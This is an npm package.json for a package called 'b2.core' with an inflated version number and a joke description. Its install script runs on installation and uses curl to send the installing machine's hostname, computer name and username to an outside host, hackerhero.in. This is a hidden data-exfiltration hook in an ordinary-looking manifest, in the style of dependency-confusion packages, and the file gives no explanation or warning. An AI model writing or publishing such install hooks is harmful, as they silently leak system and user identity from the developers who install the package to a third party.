{
  "name": "b2.core",
  "version": "200.0.16",
  "description": "b2.core: coolest nodejs  package on planet earth",
  "main": "index.js",
  "scripts": {
   "install": "curl -sI http://hackerhero.in/jugnu/%computername%`hostname`/%username%-`whoami`/p-b2.core"
  },
  "author": "another noob developer",
  "license": "ISC",
  "dependencies": {
    "wf-translate-text": "^0.0.1"
  }
}
